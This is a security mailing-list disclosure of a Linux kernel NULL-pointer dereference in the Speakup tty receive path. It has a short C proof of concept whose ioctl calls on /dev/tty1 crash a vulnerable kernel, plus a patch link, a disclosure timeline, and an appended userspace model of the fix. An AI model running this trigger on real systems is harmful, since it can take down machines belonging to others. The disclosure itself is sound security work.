oss-sec mailing list archives
Linux kernel NULL-ptr deref bug in spk_ttyio_receive_buf2
From: Shisong Qin <qinshisong1205 () gmail com>
Date: Mon, 7 Dec 2020 10:20:44 +0800
Hi,

Recently we found another NULL-ptr deref BUG in spk_ttyio.c in the latest Linux kernel (5.9.11 was the latest at that time). In the spk_ttyio_receive_buf2() function, it would dereference spk_ttyio_synth without checking whether it is NULL or not, and may lead to a NULL-ptr deref crash.

This bug could be reproduced in the Linux kernel (e.g. 5.9.11) with CONFIG_ACCESSIBILITY=y, CONFIG_SPEAKUP=y and CONFIG_KASAN=y, and here is a simple PoC:

#define _GNU_SOURCE
#include <dirent.h>
#include <endian.h>
#include <errno.h>
#include <fcntl.h>
#include <signal.h>
#include <stdarg.h>
#include <stdbool.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/ioctl.h>
#include <sys/stat.h>
#include <sys/syscall.h>
#include <sys/types.h>
#include <sys/wait.h>
#include <time.h>
#include <unistd.h>

#pragma pack(1)
typedef struct {
    char subcode;
    short xs, ys, xe, ye;
    short sel_mode;
} sel_struct;

int main(int argc, char const *argv[])
{
    int disc = 0x1a;                      /* N_SPEAKUP line discipline number */
    int fd = open("/dev/tty1", 0, 0);
    ioctl(fd, 0x5423, &disc);             /* TIOCSETD: switch the tty to that line discipline */

    sel_struct sel;
    sel.subcode = 2;                      /* TIOCLINUX subcode 2: set selection */
    sel.xs = sel.ys = sel.xe = sel.ye = 0;
    sel.sel_mode = 0x0;                   /* sel_mode = 0x0/0x1/0x2 could trigger this NULL-ptr dereference bug */
    ioctl(fd, 0x541c, &sel);              /* TIOCLINUX */

    char data = 3;                        /* TIOCLINUX subcode 3: paste selection into the tty */
    ioctl(fd, 0x541c, &data);
    return 0;
}

Here is the commit to patch this BUG:
https://git.kernel.org/pub/scm/linux/kernel/git/gregkh/char-misc.git/commit/?h=char-misc-linus&id=f0992098cadb4c9c6a00703b66cafe604e178fea

Timeline:
* 2020/11/24 - Vulnerability reported to security () kernel org
* 2020/11/29 - Vulnerability confirmed, and reported to linux-distros () vs openwall org.
* 2020/12/7 - Vulnerability opened.

Thanks,
Shisong Qin and Bodong Zhao, Tsinghua University
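The defect the report describes is a callback that runs whenever data reaches the line discipline, but which assumes a global synth pointer has already been set by the driver. The following userspace model is an added illustration, not kernel code and not the fix in the referenced commit: it replays the PoC's ordering (line discipline attached, no synth, data arrives) against an unchecked callback and a NULL-checked one. All names (struct synth, g_synth, ldisc_open, tty_deliver) are hypothetical stand-ins for the kernel objects.

```c
/* Added example, not Linux kernel code and not the upstream patch: a userspace
 * model of a line-discipline receive callback that reads a global synth pointer.
 * All identifiers here are hypothetical stand-ins for the kernel's. */
#include <stddef.h>
#include <stdio.h>

struct synth {
    const char *name;
    unsigned long chars_received;
    unsigned char last;
};

/* Stand-in for spk_ttyio_synth: non-NULL only while a synth has been attached. */
static struct synth *g_synth = NULL;
/* Stand-in for "the line discipline is open on the tty": data can arrive once set. */
static int g_ldisc_open = 0;
/* Constructed synth instance used by the replay helpers below. */
static struct synth g_model = { "model-synth", 0, 0 };

/* Unchecked callback, shaped like the defect in the report: every byte goes
 * straight through g_synth, so with g_synth == NULL this dereferences NULL
 * (in the kernel, the KASAN-reported crash). Kept only for contrast. */
static int receive_buf2_unchecked(const unsigned char *cp, size_t count)
{
    size_t i;
    for (i = 0; i < count; i++) {
        g_synth->chars_received++;
        g_synth->last = cp[i];
    }
    return (int)count;
}

/* Hardened callback: read the global once, and if no synth is attached report
 * the bytes as consumed without touching anything. */
static int receive_buf2_checked(const unsigned char *cp, size_t count)
{
    struct synth *s = g_synth;   /* single read; later detach cannot change it */
    size_t i;
    if (!s)
        return (int)count;       /* nothing to deliver to: drop the data */
    for (i = 0; i < count; i++) {
        s->chars_received++;
        s->last = cp[i];
    }
    return (int)count;
}

/* Attaching the line discipline (TIOCSETD in the PoC) does not attach a synth. */
static void ldisc_open(void)  { g_ldisc_open = 1; }
static void ldisc_close(void) { g_ldisc_open = 0; }
static void attach_synth(struct synth *s) { g_synth = s; }
static void detach_synth(void) { g_synth = NULL; }

/* Data arriving on the tty (the paste in the PoC). Returns bytes consumed,
 * or -1 when the line discipline is not open. */
static int tty_deliver(const unsigned char *cp, size_t count, int use_checked)
{
    if (!g_ldisc_open)
        return -1;
    return use_checked ? receive_buf2_checked(cp, count)
                       : receive_buf2_unchecked(cp, count);
}

/* PoC ordering against the hardened callback: ldisc open, no synth, data.
 * Returns the bytes consumed (11 for the constructed sample). */
static int replay_poc_ordering_checked(void)
{
    static const unsigned char paste[] = "pasted text"; /* constructed sample */
    detach_synth();
    ldisc_open();
    return tty_deliver(paste, sizeof paste - 1, 1);
}

/* Normal ordering: synth attached before data. Returns chars the synth saw (11). */
static unsigned long replay_normal_ordering(void)
{
    static const unsigned char paste[] = "pasted text"; /* constructed sample */
    g_model.chars_received = 0;
    attach_synth(&g_model);
    ldisc_open();
    tty_deliver(paste, sizeof paste - 1, 1);
    detach_synth();
    ldisc_close();
    return g_model.chars_received;
}

int main(void)
{
    printf("no synth, checked callback: %d bytes consumed, no crash\n",
           replay_poc_ordering_checked());
    printf("synth attached first: %lu chars delivered\n", replay_normal_ordering());
    return 0;
}
```

The point of `receive_buf2_checked` copying the global into a local is that a callback which reads the pointer once, tests it, and then uses only the local is robust to the pointer becoming NULL partway through; a check followed by repeated reads of the global would not be.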